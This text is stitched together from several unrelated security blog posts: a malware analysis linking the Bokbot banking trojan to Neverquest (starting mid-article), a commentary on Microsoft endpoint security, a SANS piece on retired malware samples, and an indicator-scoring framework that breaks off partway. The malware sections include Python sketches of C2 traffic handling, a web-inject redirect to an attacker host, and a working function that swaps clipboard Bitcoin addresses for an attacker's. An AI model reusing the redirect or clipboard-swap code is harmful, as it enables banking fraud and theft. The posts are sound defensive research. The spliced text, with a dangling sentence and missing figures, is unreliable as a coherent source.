A few months before his arrest, Nikita shared the source code of CRM within a private group of people, enabling them to continue development of the malware. This, over time, led to the appearance of multiple Gozi strains, but one stood out more than the others: Catch.

Catch was the name given internally by the malware authors, but to the security community and the public it was known as Vawtrak or Neverquest.

During the investigation into Catch it became clear that 76service and Catch shared several characteristics. Both, for example, separated their botnets into projects within the panel used for administering their infrastructure and botnets. Instead of having one huge botnet, they assigned every bot build a project ID that the bot would use to let the Command & Control (C2) server know which specific project it belonged to.

76service and Catch also shared the same business model, where they shifted back and forth between a private and rented model.

The private business model meant that they made use of their own botnet, for their own gain, and the rented business model meant that they rented out access to their botnet to customers. This provided them with an additional income stream, instead of only performing the fraud themselves.

The shift between business models could usually be correlated with either: backend servers being seized or people with business ties to the group being arrested. These types of events might have spooked the group as they limited their infrastructure, closing down access for customers.

For the sake of simplicity, Catch will from here on be referred to as Neverquest in this post.

“Quest means business” – Affiliations

A Neverquest infection might not be the only malware lurking on an infected system. Neverquest has been known to cooperate with other crimeware groups, either to distribute additional malware or to use existing botnets to distribute Neverquest.

During the investigation and tracking of Neverquest, Fox-IT identified the following ties:

  • Dyre: Download and execute Dyre on Neverquest infections.
  • TinyLoader & AbaddonPOS: Download and execute TinyLoader on Neverquest infections. TinyLoader was later seen downloading AbaddonPOS (as mentioned by Proofpoint).
  • Chanitor/Hancitor: Neverquest leverages Chanitor to infect new victims.

By leveraging these business connections, especially the connection with Dyre, Neverquest was able to maximize the monetization of its bots: Neverquest could determine whether a bot was of interest to the group and, if not, hand it off to Dyre, which could cast a wider net, targeting for example a bigger or different geographical region and utilizing the bot in a different way.

More on these affiliations in a later section.

The never ending quest comes to an end

Neverquest remained at large from around 2010, causing huge financial losses ranging from ticket fraud to wire fraud to credit card fraud. Nevertheless, in January 2017 the quest came to an end when an individual named Stanislav Lisov was arrested in Spain. He proved to be a key player in the operation: soon after the arrest, the backend servers of Neverquest went offline, never to return, marking the end of a six-year-long fraud operation.

A more detailed background on 76service and Neverquest can be found in a blogpost by PhishLabs.

A wild Bokbot appears!

Early samples of Bokbot were identified in our lab in May 2017 and also provided to us by a customer. At this time the malware was being distributed to US infections by the Geodo (aka: Emotet) spam botnet. The name Bokbot is based on a researcher who worked on the very early versions of the malware (you know who you are 😉 ).

Initial thoughts were that this was a new banking module for Geodo, as this group had not been involved in banking/fraud since May 2015. This scenario was quickly dismissed after having discovered evidence that linked Bokbot to Neverquest, which will be further outlined hereafter.

Bokbot internals

First, let’s do some housekeeping and look into some of the technical aspects of Bokbot.


All communication between a victim and the C2 server is sent over HTTPS using POST and GET requests. The initial request sent to the C2 is a POST request containing some basic information about the machine it's running on, as seen in the example below. Additional requests, such as requests for configs or modules, use GET requests, except for uploads of stolen data (files, HTML code, screenshots or credentials), which the victim submits using POST requests.

Even though the above request is from a very early version (14) of the bot, the principle still applies to the current version (101), first seen 2018-07-17.

URL parameters:

  • b: Bot identifier; contains the information needed to identify the individual bot and where it belongs. More information on this in a later section.
  • d: Type of uploaded information, for example a screenshot, grabbed form, HTML or a file.
  • e: Bot build version.
  • i: System uptime.

POST-data parameters:

  • k: Computer name (Unicode, URL-encoded).
  • l: Member of domain… (Unicode, URL-encoded).
  • j: Whether the bot requires signature verification for C2 domains and self-updates.
  • n: Privilege level the bot is running with.
  • m: Windows build information (version, architecture, build, etc.).

The parameters that are not included in the table above are used to report stolen data to the C2.
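As a rough illustration, the sketch below assembles the documented URL parameters (b, e and i) into a GET-style query string. The host, function name and values are hypothetical placeholders, not real bot traffic:

```python
from urllib.parse import urlencode

def build_checkin_url(c2_host: str, bot_id: str, build: int, uptime: int) -> str:
    # Parameter names follow the table above: b = bot identifier,
    # e = bot build version, i = system uptime.
    params = {"b": bot_id, "e": build, "i": uptime}
    return f"https://{c2_host}/?{urlencode(params)}"
```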

The C2 response for this particular bot version is a simple set of integers telling the bot which command(s) should be executed. This is the only C2 response that is unencrypted; all other responses are encrypted using RC4. Some responses, like the configs, are also compressed using LZMAT.

After a response is decrypted, the bot will check if the first 4 bytes equal “zeus”.


If the first 4 bytes are equal to “zeus”, it will decompress the rest of the data.

The reason for choosing "zeus" as the signature remains unknown; it could be an intentional false flag, an attempt to trick analysts into thinking this might be a new ZeuS strain. Similar deceptive techniques have been used before. A simpler explanation could be that the developer has an ironic sense of humor and chose the first malware name that came to mind as the 4-byte signature.
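The decrypt-then-check flow can be sketched in Python. The RC4 routine below is the standard algorithm; the LZMAT decompression is only stubbed out, and handle_response is our own name for the flow:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Standard RC4: key-scheduling (KSA) followed by the keystream
    # generator (PRGA), XORed over the data.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def handle_response(key: bytes, blob: bytes) -> bytes:
    plain = rc4(key, blob)
    if plain[:4] == b"zeus":
        # Signature matched: the remainder is LZMAT-compressed and
        # would be decompressed here (stubbed out in this sketch).
        return plain[4:]
    return plain
```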


Bokbot supports three different types of configs, all in a binary format rather than a structured format like the XML used by, for example, TheTrick.

The three configs are:

  • Bot: The latest C2 domains.
  • Injects: Targets subject to web injects and redirection attacks.
  • Reporting: Targets related to HTML grabbing and screenshots.

The first config, which includes the bot C2 domains, is signed. This prevents a takeover of any of the C2 domains from resulting in the sinkholing of the bots. Updates of the bot itself are also signed.

The other two configs are used to control how the bot will interact with the targeted entities, such as redirecting and modifying web traffic related to for example internet banking and/or email providers, for the purpose of harvesting credentials and account information.

The reporting config is used for a more generic purpose, where it’s not only used for screenshots but also for HTML grabbing, which would grab a complete HTML page if a victim browses to an “interesting” website, or if the page contains a specific keyword. This enables the actors to conduct some reconnaissance for future attacks, like being able to write web injects for a previously unknown target.

Geographical foothold

Ever since its appearance, Bokbot has been heavily focused on targeting financial institutions in the US, even though the group still gathers any data it deems interesting, such as credentials for online services.

Based on Fox-IT’s observation of the malware spread and the accompanied configs we find that North America seems to be Bokbot’s primary hunting ground while high infection counts have been seen in the following countries:

  • United States
  • Canada
  • India
  • Germany
  • Netherlands
  • France
  • United Kingdom
  • Italy
  • Japan

“I can name fingers and point names!” – Connecting the two groups

On a binary level, the two bots do not show much similarity other than the fact that both communicate over HTTPS and use RC4 in combination with LZMAT compression. But this wouldn't be much of an attribution, as it's a combination also used in, for example, ZeuS Gameover, Citadel and Corebot v1.

The list below provides a short summary of the similarities between the groups.

  • Bot and project ID format: The usage of projects and the bot ID generation are unique to these groups, along with the format in which this information is communicated to the C2.
  • Inject config: The injects and redirection entries are very similar, and the format hasn't been seen in any other malware family.
  • Reporting config: The targeted URLs and "interesting" keywords are almost identical between the two.
  • Affiliations: The two groups share business affiliations with other crimeware groups.

Bot ID, URL pattern and project IDs

When both Neverquest and Bokbot communicate with their C2 servers, they have to identify themselves by sending their unique bot ID along with a project ID.

An example of the string that the server uses in order to identify a specific bot from its C2 communication is shown below:


The placement of this string of course differs between the families: Neverquest (in its latest version) placed it, encoded, in the Cookie header field, while older versions of Neverquest sent this information in the URL. Bokbot, on the other hand, sends it in the URL, as shown in a previous section.

One important difference is that Neverquest used a simple number for their project ID, 7, in the example above. Bokbot on the other hand is using a different, unknown format for its project ID. A theory is that this could be the CRC checksum of the project name to prevent any leakage of the number of projects or their names, but this is pure speculation.

Another difference is that Bokbot has implemented an 8-bit checksum calculated over the project ID and the bot ID. This checksum is validated on the server side; if it doesn't match, no commands are returned.
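Conceptually, the server-side validation behaves like the sketch below. Bokbot's actual checksum algorithm is not described here, so the byte sum modulo 256 in checksum8 is purely an illustrative stand-in:

```python
def checksum8(project_id: str, bot_id: str) -> int:
    # Stand-in 8-bit checksum over the project ID and bot ID; the real
    # algorithm is unknown, only the idea of the check is illustrated.
    return sum((project_id + bot_id).encode("ascii")) & 0xFF

def server_accepts(project_id: str, bot_id: str, claimed: int) -> bool:
    # The C2 recomputes the checksum; on a mismatch it returns no commands.
    return checksum8(project_id, bot_id) == claimed
```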

To date, a total of 20 projects across 25 build versions have been observed, and these numbers keep growing.

Inject config – Dynamic redirect structure

The inject config contains not only web injects but also redirects. Bokbot supports both static redirects, which redirect a static URL, and dynamic redirects, which redirect a request based on a target matched using a regular expression.

The above example is a redirect attack from a Neverquest config. A regular expression is matched against the requested URL; if it matches, the name of the requested file and its extension are extracted. These two strings are then used to construct a redirect URL controlled by the actors: $1 is replaced with the file name and $2 with the file extension.


How does this compare with Bokbot?


Notice how the redirect URL contains $1 and $2, just as with Neverquest. This could of course be a coincidence, but it should be noted that this has only been observed in Neverquest and Bokbot.
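The mechanism can be illustrated with a small Python sketch. The pattern and the redirect host below are made-up examples, not entries from a real config:

```python
import re

# Hypothetical dynamic-redirect entry: match requests for .js/.css files
# and capture the file name ($1) and extension ($2).
PATTERN = re.compile(r"/([\w-]+)\.(js|css)$")
REDIRECT_TEMPLATE = r"https://attacker.example/serve/\1.\2"

def rewrite(url: str) -> str:
    # On a match, substitute the captured groups into the
    # attacker-controlled redirect URL; otherwise leave the URL alone.
    m = PATTERN.search(url)
    return m.expand(REDIRECT_TEMPLATE) if m else url
```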

Reporting config

This config was one of the first things that hinted at a connection between the two groups. Comparing the configs makes it quite clear that there is a large overlap in interesting keywords and URLs:


Neverquest is on the left and Bokbot on the right. Note that this is a simple string comparison between the configs which also includes URLs that are to be excluded from reporting.

“Guilt by association” – Affiliations

Neither of these groups is short on connections in the cybercrime underworld. As already mentioned, Neverquest had ties with Dyre, a group that by itself caused substantial financial losses. It's also important to take into account that Dyre didn't completely disappear after the group was dismantled, but was rather replaced with TheTrick, which gives a further hint of a connection.

  • Dyre (Neverquest) / TheTrick (Bokbot): Neverquest downloads & executes Dyre; Bokbot downloads & executes TheTrick.
  • TinyLoader (both): Neverquest downloads & executes TinyLoader, which downloads AbaddonPOS; Bokbot also downloads & executes TinyLoader, but the additional payload remains unknown at this time.
  • Chanitor (both): Neverquest utilizes Chanitor for its distribution; Bokbot utilizes Chanitor for its distribution and downloads the SendSafe spam malware to older infections.
  • Geodo (Bokbot only): Bokbot utilizes Geodo for distributing Bokbot.
  • Gozi-ISFB (Bokbot only): Bokbot utilizes Gozi-ISFB for distributing Bokbot.

There are a few interesting observations with the above affiliations. The first is for the Chanitor affiliation.

When Bokbot was being distributed by Chanitor, an existing Bokbot infection running an older version than the one being distributed would receive a download & execute command pointing to the SendSafe spambot, used by the Chanitor group to send spam. This suggests that they may have exchanged "infections for infections".

The Bokbot affiliation with Geodo is something that cannot be linked to Neverquest, mostly due to the fact that Geodo has not been running its spam operation long enough to overlap with Neverquest.

The graph below shows all the observed affiliations to date.


Events over time

All of the above information has been collected over time during the development and tracking of Bokbot. The events and observations are shown on the timeline below.


The first occurrence of TheTrick being downloaded was in July 2017, but Bokbot has since downloaded TheTrick on various occasions.

At the end of December 2017 there was little Bokbot activity, likely because of the holidays. It's not uncommon for cybercriminals to decrease their activity around the turn of the year; supposedly everyone needs holidays, even cybercriminals. They did, however, push an inject config to some bots that targeted *.com with the goal of injecting JavaScript to mine the Monero cryptocurrency. As soon as an infected user visited a website with a .com top-level domain (TLD), the browser would start mining Monero for the Bokbot actors. This was likely an attempt to passively monetize the bots while the actors were on holiday.

Bokbot remains active and shows no signs of slowing down. Fox-IT will continue to monitor these actors closely.

Making Sense of Microsoft’s Endpoint Security Strategy

Microsoft is no longer content to simply delegate endpoint security on Windows to other software vendors. The company has released, fine-tuned or rebranded multiple security technologies in a way that will have lasting effects on the industry and Windows users. What is Microsoft's endpoint security strategy and how is it evolving?

Microsoft offers numerous endpoint security technologies, most of which include “Windows Defender” in their name. Some resemble built-in OS features (e.g., Windows Defender SmartScreen), others are free add-ons (e.g., Windows Defender Antivirus), while some are commercial enterprise products (e.g., the EDR component of Windows Defender Advanced Threat Protection). I created a table that explains the nature and dependencies of these capabilities in a single place. Microsoft is in the process of unifying these technologies under the Windows Defender Advanced Threat Protection branding umbrella—the name that originally referred solely to the company’s commercial incident detection and investigation product.

Microsoft’s approach to endpoint security appears to be pursuing the following 3 objectives:

  • Motivate other vendors to innovate beyond the commodity security controls that Microsoft offers for its modern OS versions. Windows Defender Antivirus and Windows Defender Firewall with Advanced Security (WFAS) on Windows 10 are examples of such tech. Microsoft has been expanding these essential capabilities to be on par with similar features of commercial products. This not only gives Microsoft control over the security posture of its OS, but also forces other vendors to tackle the more advanced problems on the basis of specialized expertise or other strategic abilities.
  • Expand the revenue stream from enterprise customers. To centrally manage Microsoft's endpoint security layers, organizations will likely need to purchase System Center Configuration Manager (SCCM) or Microsoft Intune. Obtaining some of Microsoft's security technologies, such as the EDR component of Windows Defender Advanced Threat Protection, requires upgrading to the high-end Windows Enterprise E5 license. By bundling such commercial offerings with other products, rather than making them available in a standalone manner, the company motivates customers to shift all aspects of their IT management to Microsoft.

In pursuing these objectives, Microsoft developed the building blocks that are starting to resemble features of commercial Endpoint Protection Platform (EPP) products. The resulting solution is far from perfect, at least at the moment:

  • Centrally managing and overseeing these components is difficult for companies that haven’t fully embraced Microsoft for all their IT needs or that lack expertise in technologies such as Group Policy.
  • Making sense of the security capabilities, interdependencies and licensing requirements is challenging, frustrating and time-consuming.
  • Most of the endpoint security capabilities worth considering are only available for the latest versions of Windows 10 or Windows Server 2016. Some have hardware dependencies and are incompatible with older hardware.
  • Several capabilities have dependencies that are incompatible with other products.  For instance, security features that rely on Hyper-V prevent users from using the VMware hypervisor on the endpoint.
  • Some technologies are still too immature or impractical for real-world deployments. For example, using my Windows 10 system after enabling the Controlled folder access feature became unbearable after a few days.
  • The layers fit together in an awkward manner at times. For instance, Microsoft provides two app whitelisting technologies—Windows Defender Application Control (WDAC) and AppLocker—that overlap in some functionality.

While infringing on the territory traditionally dominated by third-parties on the endpoint, Microsoft leaves room for security vendors to provide value and work together with Microsoft’s security technologies. For example:

Some of Microsoft’s endpoint security technologies still feel disjointed. They’re becoming less so, as the company fine-tunes its approach to security and matures its capabilities. Microsoft is steadily guiding enterprises towards embracing Microsoft as the de facto provider of IT products. Though not all enterprises will embrace an all-Microsoft vision for IT, many will. Endpoint security vendors will need to crystallize their role in the resulting ecosystem, expanding and clarifying their unique value proposition. (Coincidentally, that’s what I’m doing at Minerva Labs, where I run product management.)

Retired Malware Samples: Everything Old is New Again

I’m always on the quest for real-world malware samples that help educate professionals how to analyze malicious software. As techniques and technologies change, I introduce new specimens and retire old ones from the reverse-engineering course I teach at SANS Institute.  Here are some of the legacy samples that were once present in FOR610 materials. Though these malicious programs might not appear relevant anymore, aspects of their functionality are present even in modern malware.

A Backdoor with a Backdoor

To learn fundamental aspects of code-based and behavioral malware analysis, the FOR610 course at one point examined Slackbot, an IRC-based backdoor that its author "slim" distributed as a compiled Windows executable without source code.

Dated April 18, 2000, Slackbot came with a builder that allowed its user to customize the name of the IRC server and channel it would use for Command and Control (C2). Slackbot documentation explained how the remote attacker could interact with the infected system over their designated channel and included this taunting note:

“don’t bother me about this, if you can’t figure out how to use it, you probably shouldn’t be using a computer. have fun. –slim”

Those who reverse-engineered this sample discovered that it had undocumented functionality. In addition to connecting to the user-specified C2 server, the specimen also reached out to a hardcoded server that "slim" controlled. The #penix channel gave "slim" the ability to take over all the botnets that his or her "customers" were building for themselves.

It turned out this backdoor had a backdoor! Not surprisingly, backdoors continue to be present in today's "hacking" tools. For example, I came across a DarkComet RAT builder that was surreptitiously bundled with a DarkComet backdoor of its own.

You Are an Idiot

The FOR610 course used an example of a simple malevolent web page to introduce the techniques for examining potentially-malicious websites. The page, captured below, was a nuisance that insulted its visitors with the following message:

When the visitor attempted to navigate away from the offending site, its JavaScript popped up new instances of the page, making it very difficult to leave. Moreover, each instance of the page played the following jingle on the victim’s speakers. “You are an idiot,” the song exclaimed. “Ahahahahaha-hahahaha!” The cacophony of multiple windows blasting this jingle was overwhelming.


A while later I came across a network worm that played this sound file on victims' computers, though I cannot find that sample anymore. While writing this post, I was surprised to discover a version of this page, sans the multi-window JavaScript trap, residing on Maybe it's true what they say: a good joke never gets old.

Clipboard Manipulation

When Flash reigned supreme among banner ad technologies, the FOR610 course covered several examples of such forms of malware. One of the Flash programs we analyzed was a malicious version of the ad pictured below:

At one point, visitors to legitimate websites, such as MSNBC, were reporting that their clipboards appeared “hijacked” when the browser displayed this ad. The advertisement, implemented as a Flash program, was using the ActionScript setClipboard function to replace victims’ clipboard contents with a malicious URL.

The attacker must have expected the victims to blindly paste the URL into messages without looking at what they were sharing. I remembered this sample when reading about a more recent example of malware that replaced Bitcoin addresses stored in the clipboard with the attacker’s own Bitcoin address for payments.
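The clipboard swap is easy to sketch. The regular expression below matches the general shape of a legacy Bitcoin address, and the attacker address is a made-up placeholder:

```python
import re

# Legacy (Base58) Bitcoin addresses start with 1 or 3 and avoid the
# easily confused characters 0, O, I and l.
BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
ATTACKER_ADDR = "1AttackerAddressPlaceholderXXXXXXX"  # hypothetical

def swap_clipboard(text: str) -> str:
    # Replace any Bitcoin address found in the clipboard text; a victim
    # who pastes without checking sends funds to the attacker instead.
    return BTC_RE.sub(ATTACKER_ADDR, text)
```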

As malware evolves, so do our analysis approaches, and so do the exercises we use in the FOR610 malware analysis course.  It’s fun to reflect upon the samples that at some point were present in the materials. After all, I’ve been covering this topic at SANS Institute since 2001. It’s also interesting to notice that, despite the evolution of the threat landscape, many of the same objectives and tricks persist in today’s malware world.

Kinetic and Potential Energy Framework: Applying Thermodynamics to Threat Intelligence

ThreatConnect conducts a thought experiment and proposes a framework for evaluating and triaging indicators based on physical energy properties

All variety of scientists, from chemists to physicists and engineers, measure kinetic and potential energies to better understand how objects are acting or will act within a given situation or system. We posit that these energy concepts can be applied to threat intelligence as a framework to better understand and evaluate indicators and the intelligence associated with them.

Cyber threat intelligence consumers or producers can use this kinetic and potential energy framework to accomplish the following:

  • Scrutinize indicators for the relevant context that would ultimately constitute "intelligence."
  • Evaluate and triage indicators, reported activity, and intelligence feeds or reports based on basic, inherent intelligence requirements.
  • Differentiate indicators' scores based on their relevance to a specific industry or set of intelligence requirements.
  • Identify intelligence gaps and collection requirements to further enable a threat intelligence program.
  • Share the necessary context or calculated energies to facilitate a consumer's integration of provided information.

We'll start by describing some common issues with threat intelligence that we hope the application of this framework can mitigate or deter.

Issues with Cyber Threat Intelligence

Intelligence Requirements

At many organizations, incident responders or security operations center (SOC) personnel might be dual-hatted and also serve as threat intelligence analysts. Organizations with dedicated threat intelligence teams or individuals are uncommon, and many times those organizations still have issues integrating intelligence analysts with the typical incident response function and wind up not seeing or realizing the full potential of threat intelligence. Those shortcomings often manifest in specific problems like a lack of intelligence requirements.

If you're asking what intelligence requirements are and why they matter, don't worry: you're not alone. To summarize, intelligence requirements essentially identify what intelligence analysts at a given organization focus on. If you consider the intelligence cycle, intelligence requirements are part of the planning and direction step.

The Intelligence Cycle


Let's say you're an organization operating in the healthcare sector. A very basic intelligence requirement for your organization might be to identify activity targeting the healthcare sector. That requirement would then dictate the sources of information that you collect or procure, how you would process and exploit that information, the specific intelligence analysis that you produce from exploiting that collection, and what and how you disseminate and integrate that analysis at your organization.

Oftentimes organizations don't have any identified intelligence requirements. When that's the case, threat intelligence research without intelligence requirements is just surfing the web. Conversely, some organizations will say that they want to know about everything, so "everything" is their intelligence requirement. If everything is your intelligence requirement, you'll end up being inefficient with your defensive resources. Intelligence requirements also have to be relatively specific so that execution against them within the intelligence cycle can be tracked.


For organizations that are getting started with threat intelligence or don't already have identified intelligence requirements, there are basic intelligence requirements that your organization can use. These might seem overly simplified - which they are - but they are still significantly more specific than "everything" and can give threat intelligence teams a general heading. Those basic intelligence requirements include the following:

  • Activity targeting my sector
  • Activity targeting my organization
  • Activity targeting specific data types that my organization secures (e.g., protected health information, or PHI)
  • Activity emanating from my known adversaries

"Intelligence" Feeds or Reports

Indicators in and of themselves are not threat intelligence, but too often feeds and reports will claim to be intelligence when really they are only indicators. Context maketh intelligence. Consider the Grizzly Steppe Joint Analysis Report from two years ago. There were hundreds of indicators shared in that report, but the context that was shared with each of those indicators was insufficient to actually qualify them as intelligence. Ideally, cyber threat intelligence feeds and sources would answer all (or at least two) of the following, which generally correspond to the vertices and axes on the Diamond Model of Intrusion Analysis:

  • Who the bad guys are
  • What they are doing
  • How they are doing it
  • Who they are doing it against
  • Why they are doing it
  • What they will do next

Focus on Known Bad

Finally, the last issue worth noting is a general focus on known bad activity or indicators. Don't get us wrong, this is completely necessary. But it fails to recognize that, if we employ threat intelligence to its fullest extent, we can proactively identify indicators that might be used in malicious activity in the future but aren't yet known to be malicious. Otherwise, what you're left with is playing whack-a-mole with indicators that may not even be in use by the time you hear about them.

By using this kinetic and potential energy framework, organizations can triage indicators and activity using basic intelligence requirements, scrutinize reports for relevant intelligence, evaluate their intelligence sources or reports, and include a more proactive approach to defense that incorporates suspicious indicators.

A Quick Thermodynamics Lesson

Kinetic and potential are different states of energy that describe the capability of an object to do work. Kinetic energy results from an object in motion, such as a moving car. Potential energy comes from an object's position or configuration and may be converted into kinetic energy, such as a ball held above the ground or a compressed spring. To measure and understand these energies over time, scientists have to measure things like an object's velocity, vector, height, and compression, while also taking into account energy-degrading factors like friction or gravity.
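For reference, the textbook classical-mechanics forms of these quantities are:

```latex
KE = \tfrac{1}{2} m v^2
\qquad
PE_{\text{gravity}} = m g h
\qquad
PE_{\text{spring}} = \tfrac{1}{2} k x^2
```

where m is mass, v is velocity, g is gravitational acceleration, h is height, k is the spring constant, and x is the compression distance.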

To better explain kinetic and potential energy, let's consider a bow and arrow. A bow and arrow by themselves have no energy. When a bow is drawn to shoot the arrow, energy is put into the bow and arrow system. This energy is potential energy and is held in the drawn string of the bow. That potential energy can then be transferred into the arrow by releasing the string and shooting the arrow. At that point, the arrow that is flying through the air has kinetic energy while the potential energy in the bow is gone. This kinetic energy will then degrade as friction from the air and gravity act on the arrow until it hits its target or falls to the ground.

Let's now consider that there is an arrow that we have to physically defend our organization against. Generally, this arrow has several characteristics that we want to understand to determine if and how we defend against it:

  • Whether the bow has been drawn
  • Whether the arrow has been shot
  • Where the arrow was shot from
  • What the arrow was shot at
  • How fast the arrow is traveling
  • Who shot the arrow

Correlation to Threat Intelligence

Those characteristics of the arrow that we want to understand are essentially threat intelligence, and those arrows aren't all that different from indicators. In some cases there are indicators that we aren't going to care about because they weren't shot at our organization or any similar organizations.

The things that we want to know about arrows relate to our intelligence requirements. Many of those intelligence requirements manifest in the physical energy properties (was the arrow shot, how fast and where is it traveling, is the bow drawn), so maybe indicators have relatable energies that we can measure to evaluate and better understand them.

Factors to Measure

When considering kinetic and potential energies for indicators, there are certain variables that we want to include in our equations to capture the necessary data points for the indicators we're evaluating. These factors mimic those that scientists measure to calculate energies. For kinetic energy, we want to include velocity, vector (or direction), and its degradation over time:

  • Velocity is simply going to be binary: is the indicator active or not?
  • Vector will be a combination of binary, relative factors. Depending on your frame of reference (the organization you're in, your sector, the data you safeguard), that calculated vector will be different.
  • Degradation: much as gravity or friction ultimately reduce kinetic energy, time will reduce the kinetic energy of an indicator.

Potential energy is a bit more nebulous. The main variables we're interested in are the compression or height and the degradation over time:

  • Compression/Height is where things might get sticky. This is going to be binary and relative to our frame of reference, like the vector for kinetic energy, but it is going to necessitate a better understanding of our adversary and their tactics.
  • Degradation is similar to what it is for kinetic energy with time ultimately reducing the potential energy of an indicator.

Our Equations

As we considered those factors that play into kinetic and potential energy, we ultimately generated the below equations to measure those energies. Keep in mind that these are the equations that we've developed to account for the aforementioned factors in the cyber world. The way that your organization views these factors and ultimately uses them to measure kinetic and potential energy may differ. More on that later.

Kinetic Energy

KE = U × ((S + O + D + A) / 4) × ((P − t) / P), where U is the velocity, (S + O + D + A) / 4 is the vector, and (P − t) / P is the degradation over a deprecation period P at time t

Kinetic energy for a given indicator is relative, meaning it is going to be different based on who is evaluating it and what organization they are a part of. Usually, any indicator with a kinetic energy greater than 0 deserves additional attention, and the higher the kinetic energy, the more pertinent the indicator is going to be to the individual or organization evaluating it. Considering the scale below, the more of those inherent intelligence requirements an indicator hits on, the higher its kinetic energy will be, and thus the greater its relevance to your organization.


Let's break down the different factors in the equation:

  • Velocity: To start off, if the indicator hasn't actually been used in an operation, U is going to be 0 so the kinetic energy is going to be 0. In that case, we'd move to potential energy and evaluate that.
  • Vector: S+O+D+A really represents those distilled, basic, inherent intelligence requirements referenced earlier. For our equation, we're treating all of these factors equally, but when doing this for your organization, you might choose to change it up a bit. This part of the equation represents essentially where that indicator is directed.
  • Degradation: The kinetic energy is going to decrease over time and ultimately approach 0 based on a deprecation period.
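As an illustrative sketch (not ThreatConnect's production code), the kinetic energy calculation might be implemented as follows, with a binary U flag for used-in-operations, binary S/O/D/A flags for the sector, organization, data-type, and adversary requirements, and a linear decay over the deprecation period:

```python
def kinetic_energy(used, sector, org, data, adversary,
                   days_since_seen, deprecation_days):
    """Kinetic energy of an indicator: velocity x vector x degradation.

    `used` (U), `sector` (S), `org` (O), `data` (D), and `adversary` (A)
    are binary: 1 = yes, 0 = no.
    """
    if not used:  # U = 0: no kinetic energy; evaluate potential energy instead
        return 0.0
    vector = (sector + org + data + adversary) / 4.0   # equally weighted S+O+D+A
    degradation = max(0.0, 1.0 - days_since_seen / deprecation_days)
    return vector * degradation
```

For example, an active indicator that hits on your sector and a known adversary (S = A = 1, O = D = 0), observed 90 days ago with a 360-day deprecation period, scores 0.5 × 0.75 = 0.375.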

Potential Energy

Potential energy should only be evaluated when an indicator is not known to have been used in an attack. Potential energy correlates with what might happen that is relevant to a given organization based on known adversaries. When indicators with potential energy greater than 0 are addressed, organizations are being proactive in defense. These are the factors in the potential energy equation:

  • Compression/Height: Potential energy necessitates an understanding of your adversaries and their tactics. When those things aren't known, that can be considered an intelligence gap.
  • Degradation is similar to what it is for kinetic energy, with time ultimately reducing the potential energy of an indicator. It should be noted, however, that the period over which you deprecate these suspicious indicators might differ from the period over which you deprecate known bad indicators.
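A potential energy score might be sketched the same way (again, our own illustrative reading, not official code), with a binary tactics-match flag standing in for the compression/height factor:

```python
def potential_energy(used, tactics_match, days_since_seen,
                     suspicious_deprecation_days):
    """Potential energy of a not-yet-malicious indicator.

    `tactics_match` is binary: 1 if the indicator is consistent with a
    known adversary's tactics (the compression/height factor), else 0.
    """
    if used:  # known-bad indicators carry kinetic, not potential, energy
        return 0.0
    degradation = max(0.0, 1.0 - days_since_seen / suspicious_deprecation_days)
    return tactics_match * degradation
```

A suspicious indicator matching a known adversary's tactics, seen 180 days into a 360-day suspicious-indicator deprecation period, would score 0.5.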

Applying the Equations

Now we'll apply these equations and use these energies to better understand a group of indicators. We'll evaluate these indicators from the perspective of five different organizations: a financial company specifically working with cryptocurrency, and pharmaceutical, media, sporting, and think tank organizations. The indicators we'll evaluate include the following:

  • Arkouowi[.]com was identified in an Accenture report on 2018 Hogfish (aka APT10) operations targeting organizations in Japan; however, no context was given for the type of sector or data that was targeted. APT10 is known to have targeted financial and pharmaceutical organizations, among others.
  • Ikmtrust[.]com was identified in an Arbor Network 2018 report on Fancy Bear lojack operations, but no targeted sector or data type were included in the report. Fancy Bear is known to have targeted media, sport, and think tank organizations, among others.
  • 222.122.31[.]115 was identified in an Intezer report as part of a Hidden Cobra operation targeting the financial sector. Specifically they targeted data and organizations related to cryptocurrency. Hidden Cobra is known to have targeted financial and media organizations.
  • Fifacups[.]org was not identified in operations, but the domain was registered (Incident 20180326A: Domains Using Suspicious Name Servers and Hosted on Dedicated Servers) through a suspicious name server and as of July 24 2018 is hosted on a dedicated server at 5.135.237[.]219. Those tactics are consistent with previously identified Fancy Bear tactics.
  • Atlanticouncil[.]org was not identified in operations, but the domain was registered (Incident 20180611A: Additional Patchwork Infrastructure) at essentially the same time and through the same registrar as domains identified in a Volexity report on Patchwork activity targeting US think tanks. As of July 23 2018, this domain is also hosted on a dedicated server at 176.107.177[.]7. Patchwork is known to have targeted US think tanks and Chinese political and military organizations, among others.

Based on the above intelligence related to these indicators, we can calculate the kinetic and potential energy for each from the perspective of the organizations we previously mentioned. For the purposes of these calculations, we'll assume that the financial cryptocurrency organization deprecates malicious indicators after 180 days, while all of the rest deprecate them after 360 days. We'll also assume that all of the organizations deprecate suspicious indicators after 360 days. Here are examples for two of the indicators:



Since this indicator has not been identified in operations (our U variable is 0), its kinetic energy is 0, so we then proceed to evaluate its potential energy.
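As a purely hypothetical illustration of that potential-energy arithmetic (the numbers here are ours, not drawn from the report figures): a suspicious domain consistent with a known adversary's tactics, registered 45 days before the calculation date, for an organization that deprecates suspicious indicators after 360 days:

```python
# Hypothetical inputs: U = 0 (not seen in operations), tactics match C = 1,
# t = 45 days since registration, suspicious deprecation period P = 360 days.
C, t, P = 1, 45, 360
pe = C * max(0.0, 1 - t / P)   # compression/height x degradation
print(pe)                      # 0.875
```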


Understanding Results

Based on a calculation date of July 24 2018, we ultimately come up with the below measurements for these indicators' kinetic and potential energies.

When we rack and stack the findings for each organization, we can see how organizations might go about prioritizing the review of some indicators before others. For example, the 222.122.31[.]115 IP address would be a higher priority for the financial cryptocurrency organization and a lower one for the media organization.

We also see that, within these results, there are no potential energy scores for the financial or pharmaceutical organizations. If we conduct this analysis for a number of our sources and don't have any potential energy scores, that is something that can feed our collection requirements. In that case, we need to pursue different sources that focus on identifying suspicious indicators associated with our specific adversaries' tactics.

Important Notes

There are several important notes to mention now that we've employed the framework and gone through the analysis. To start off, potential and kinetic energy shouldn't be directly compared because they aren't a one-to-one measure. How you treat each will most likely differ.

